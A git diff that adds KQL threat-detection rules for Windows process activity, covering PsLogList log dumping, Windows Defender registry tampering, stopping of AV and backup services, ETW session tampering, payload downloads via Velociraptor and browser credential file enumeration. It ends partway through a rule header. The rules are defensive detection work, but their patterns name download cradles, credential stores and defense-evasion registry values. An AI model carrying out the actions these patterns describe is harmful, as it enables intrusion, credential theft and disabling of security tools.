diff --git a/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql
new file mode 100644
index 00000000..b33a447b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_use_of_psloglist.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Use of PsLogList
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
+// False Positives:
+//   - Another tool that uses the command line switches of PsLogList
+//   - Legitimate use of PsLogList by an administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql
new file mode 100644
index 00000000..fbb6d960
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_userinit_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Userinit Child Process
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea)
+// Date: 2019-06-17
+// Level: medium
+// Description: Detects a suspicious child process of userinit
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+//   - Administrative scripts
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(((FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe" or ProcessCommandLine =~ "C:\\Windows\\Explorer.EXE") or ProcessCommandLine contains "\\netlogon\\" or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql
new file mode 100644
index 00000000..c8a806ef
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_vboxdrvinst_exe_parameters.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious VBoxDrvInst.exe Parameters
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file.
+// This allows to create values in the registry and install drivers.
+// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql
new file mode 100644
index 00000000..93c86590
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_velociraptor_child_process.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Velociraptor Child Process
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-29
+// Level: high
+// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219
+// False Positives:
+//   - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql
new file mode 100644
index 00000000..9d5b0e1c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_vsls_agent_command_with_agentextensionpath_load.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load
+// Author: bohops
+// Date: 2022-10-30
+// Level: medium
+// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - False positives depend on custom use of vsls-agent.exe
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent."))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..1e39d40e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_webdav_client_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WebDav Client Execution Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
+// Date: 2023-03-16
+// Level: high
+// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254.")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_where_execution.kql b/KQL/rules/windows/process_creation/suspicious_where_execution.kql
new file mode 100644
index 00000000..dea00dd8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_where_execution.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Where Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: low
+// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
+// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
+// internal network resources such as servers, tools/dashboards, or other related infrastructure.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql
new file mode 100644
index 00000000..35bbfec1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
new file mode 100644
index 00000000..dfd7e2e0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-22
+// Level: high
+// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Rare legitimate use by administrators to test software (should always be investigated)
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql
new file mode 100644
index 00000000..9320a3fa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windows_service_tampering.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Windows Service Tampering
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001
+// False Positives:
+//   - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql
new file mode 100644
index 00000000..b43493dc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-02-11
+// Level: high
+// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001
+// False Positives:
+//   - Legitimate deactivation by administrative staff
+//   - Installer tools that disable services, e.g. before log collection agent installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql
new file mode 100644
index 00000000..75bbb803
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windows_update_agent_empty_cmdline.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Windows Update Agent Empty Cmdline
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-26
+// Level: high
+// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql
new file mode 100644
index 00000000..ebd0dfea
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_windowsterminal_child_processes.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious WindowsTerminal Child Processes
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-25
+// Level: medium
+// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence
+// False Positives:
+//   - Other legitimate "Windows Terminal" profiles
+
+DeviceProcessEvents
+| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql
new file mode 100644
index 00000000..ccfee321
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_wmic_execution_via_office_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WMIC Execution Via Office Process
+// Author: Vadim Khrykov, Cyb3rEng
+// Date: 2021-08-23
+// Level: high
+// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).
